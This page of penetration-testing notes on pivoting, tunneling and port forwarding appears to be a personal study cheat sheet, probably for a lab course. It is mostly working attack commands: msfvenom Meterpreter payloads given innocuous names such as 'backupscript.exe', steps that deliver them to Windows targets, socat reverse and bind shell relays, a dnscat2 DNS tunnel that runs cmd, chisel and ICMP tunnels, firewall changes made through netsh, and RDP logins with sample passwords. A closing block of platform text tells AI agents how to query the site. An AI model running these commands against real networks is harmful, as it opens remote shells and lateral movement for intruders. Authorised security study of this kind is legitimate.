> For the complete documentation index, see [llms.txt](https://strange-1.gitbook.io/notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://strange-1.gitbook.io/notes/side-notes/pivoting-tunneling-and-port-forwarding.md). # Pivoting, Tunneling, and Port Forwarding ## **Dynamic Port Forwarding with SSH and SOCKS Tunneling** ### Local Port Forwarding ```bash # 1234 - attack host port # 3306 - target host port ssh -L 1234:localhost:3306 Ubuntu@ip # Confirm netstat -antp | grep 1234 # Multiple port forward ssh -L 1234:localhost:3306 8080:localhost:80 ubuntu@ip ``` ### Dynamic Port Forwarding ```bash # Enabling Dynamic Port Forwarding # 9050 - attack host port ssh -D 9050 ubuntu@ip # Editing proxychains configuration file /etc/proxychains.conf # We can add socks4 127.0.0.1 9050 to the last line if it is not already there. # Checking /etc/proxychains.conf tail -4 /etc/proxychains.conf # Using Nmap with Proxychains proxychains nmap -v -sn 172.16.5.1-200 <--ip range which we were not able to scan before, i.e Internal Network # Using Metasploit with Proxychains proxychains msfconsole # Using xfreerdp with Proxychains proxychains xfreerdp /v:ip /u:eren /p:pass ``` ## **Remote/Reverse Port Forwarding with SSH** ```bash # Creating a Windows Payload with msfvenom msfvenom -p windows/x64/meterpreter/reverse_https lhost= -f exe -o backupscript.exe LPORT=8080 # Configuring & Starting the multi/handler set payload windows/x64/meterpreter/reverse_https set lhost 0.0.0.0 set lport 8000 # Transferring Payload to Pivot Host scp backupscript.exe ubuntu@:~/ # Starting Python3 Webserver on Pivot Host python3 -m http.server 8123 # Downloading Payload from Windows Target PS C:\\Windows\\system32> Invoke-WebRequest -Uri "" -OutFile "C:\\backupscript.exe" # SSH remote port forwarding ssh -R :8080:0.0.0.0:8000 ubuntu@ -vN # RUN the payload and get a shell ``` ## **Meterpreter Tunneling & Port Forwarding** ```bash # Creating Payload for Ubuntu Pivot Host msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.16.10 -f elf -o backupjob LPORT=8080 # Configuring & Starting the multi/handler set lhost 0.0.0.0 set lport 8080 set payload linux/x64/meterpreter/reverse_tcp # Transfer and Execute the Payload on the Pivot Host # After we get shell on Pivot host, we can user meterpreter modules for different tasks # Ping Sweep module run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23 # Ping Sweep For Loop on Linux Pivot Hosts for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done # Ping Sweep For Loop Using CMD for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply" # Ping Sweep Using PowerShell 1..254 | % {"172.16.5.$($_): $(Test-Connection -count 1 -comp 172.15.5.$($_) -quiet)"} # **Configuring MSF's SOCKS Proxy** use auxiliary/server/socks_proxy set SRVPORT 9050 set SRVHOST 0.0.0.0 set version 4a # Confirming Proxy Server is Running jobs # Adding a Line to proxychains.conf if Needed socks4 127.0.0.1 9050 # Creating Routes with AutoRoute use post/multi/manage/autoroute set SESSION 1 set SUBNET 172.16.5.0 run autoroute -s 172.16.5.0/23 # Testing Proxy & Routing Functionality proxychains nmap 172.16.5.19 -p3389 -sT -v -Pn ``` #### **Port Forwarding - portfwd module** ```bash # Creating Local TCP Relay portfwd add -l 3300 -p 3389 -r 172.16.5.19 # Connecting to Windows Target through localhost xfreerdp /v:localhost:3300 /u:victor /p:pass@123 ``` #### **Meterpreter Reverse Port Forwarding** ```bash # Reverse Port Forwarding Rules portfwd add -R -l 8081 -p 1234 -L 10.10.14.18 # Configuring & Starting multi/handler # If we have a shell already, run bg command set payload windows/x64/meterpreter/reverse_tcp set LPORT 8081 set LHOST 0.0.0.0 # Generating the Windows Payload msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.5.129 -f exe -o backupscript.exe LPORT=1234 ``` ## Socat ### **Socat Redirection with a Reverse Shell** ```bash # Starting Socat Listener on pivot host # 10.10.14.18:80 - atttack host ip and port socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80 # Creating the Payload - Windows # 172.16.5.129 - ip of pivot host msfvenom -p windows/x64/meterpreter/reverse_https LHOST=172.16.5.129 -f exe -o backupscript.exe LPORT=8080 # Configuring & Starting the multi/handler set payload windows/x64/meterpreter/reverse_https set lhost 0.0.0.0 set lport 80 ``` ### **Socat Redirection with a Bind Shell** ```bash # Creating the Payload - Windows # Bind shell msfvenom -p windows/x64/meterpreter/bind_tcp -f exe -o backupscript.exe LPORT=8443 # Starting Socat Bind Shell Listener # 172.16.5.19:8443 - ip, port of system on internal network socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443 # Configuring & Starting the Bind multi/handler set payload windows/x64/meterpreter/bind_tcp set RHOST 10.129.202.64 <-- ip of pivot host set LPORT 8080 <-- port of pivot host ``` ## **SSH for Windows: plink.exe** ### Dynamic port forwarding ```bash # This starts an SSH session between the Windows attack host and the Ubuntu server, and then plink starts listening on port 9050. plink -D 9050 ubuntu@10.129.15.50 # Proxifier - Proxifier can be used to start a SOCKS tunnel via the SSH session we created. ``` ## **SSH Pivoting with Sshuttle** ```bash # Installation sudo apt-get install sshuttle # Running Sshuttle sudo sshuttle -r ubuntu@10.129.202.64 172.16.5.0/23 -v ``` ## **Web Server Pivoting with Rpivot** ```bash # Installation sudo git clone # python 2.7 sudo apt-get install python2.7 # Running server.py from the Attack Host python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0 # Transfering rpivot to the Target scp -r rpivot ubuntu@:/home/ubuntu/ # Running client.py from Pivot Target python2.7 client.py --server-ip 10.10.14.18 --server-port 9999 # Browsing to the Target Webserver using Proxychains proxychains firefox-esr 172.16.5.135:80 # Connecting to a Web Server using HTTP-Proxy & NTLM Auth python client.py --server-ip --server-port 8080 --ntlm-proxy-ip IPaddressofProxy> --ntlm-proxy-port 8081 --domain --username --password ``` ## **Port Forwarding with Windows Netsh** ```bash # Using Netsh.exe to Port Forward netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.25 # Verifying Port Forward netsh.exe interface portproxy show v4tov4 # changing firewall rules to allow the traffic (if needed) netsh advfirewall firewall add rule name="forward_port_rule" protocol=TCP dir=in localip=192.168.151.10 localport=8080 action=allow # Connecting to the Internal Host through the Port Forward # traffice for 10.129.15.150:8080(pivot host ) will be forwarded to 172.16.5.25:3389(internal network host) xfreerdp /v:10.129.15.150:8080 /u:eren /p:pass ``` ## **DNS Tunneling with Dnscat2** ```bash # Cloning dnscat2 and Setting Up the Server git clone cd dnscat2/server/ gem install bundler bundle install # Starting the dnscat2 server, save secret key for future authentication sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=domain.local --no-cache # Cloning dnscat2-powershell to the Attack Host git clone # Importing dnscat2.ps1 PS C:\> Import-Module .\\dnscat2.ps1 # establish a tunnel with the server running on our attack host. PS C:\> Start-Dnscat2 -DNSserver 10.10.14.18 -Domain domain.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd # If eveything wokrs, we will get a shell, can use it to interact # Listing dnscat2 Options dnscat2> ? # Interacting with the Established Session dnscat2> window -i 1 ``` ## **SOCKS5 Tunneling with Chisel** ```bash # Setting Up & Using Chisel git clone cd chisel go build # Transferring Chisel Binary to Pivot Host scp chisel ubuntu@10.129.202.64:~/ # Running the Chisel Server on the Pivot Host ./chisel server -v -p 1234 --socks5 # Connecting to the Chisel Server ./chisel client -v 10.129.202.64:1234 socks # Editing & Confirming proxychains.conf socks5 127.0.0.1 1080 # Pivoting to the DC proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123 ``` ### **Chisel Reverse Pivot** ```bash # Starting the Chisel Server on our Attack Host sudo ./chisel server --reverse -v -p 1234 --socks5 # Then we connect from the pivot host to our attack host, using the option R:socks ./chisel client -v 10.10.14.17:1234 R:socks # Editing & Confirming proxychains.conf socks5 127.0.0.1 1080 # Pivoting to internal host proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123 ``` ## **ICMP Tunneling with SOCKS** ```bash # Setting Up & Using ptunnel-ng git clone # Building Ptunnel-ng with Autogen.sh sudo ./autogen.sh # Transferring Ptunnel-ng to the Pivot Host scp -r ptunnel-ng ubuntu@10.129.202.64:~/ # Starting the ptunnel-ng Server on the Target Host sudo ./ptunnel-ng -r10.129.202.64 -R22 # Connecting to ptunnel-ng Server from Attack Host sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22 # Tunneling an SSH connection through an ICMP Tunnel ssh -p2222 -lubuntu 127.0.0.1 # Enabling Dynamic Port Forwarding over SSH ssh -D 9050 -p2222 -lubuntu 127.0.0.1 # Proxychaining through the ICMP Tunnel proxychains nmap -sV -sT 172.16.5.19 -p3389 ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://strange-1.gitbook.io/notes/side-notes/pivoting-tunneling-and-port-forwarding.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.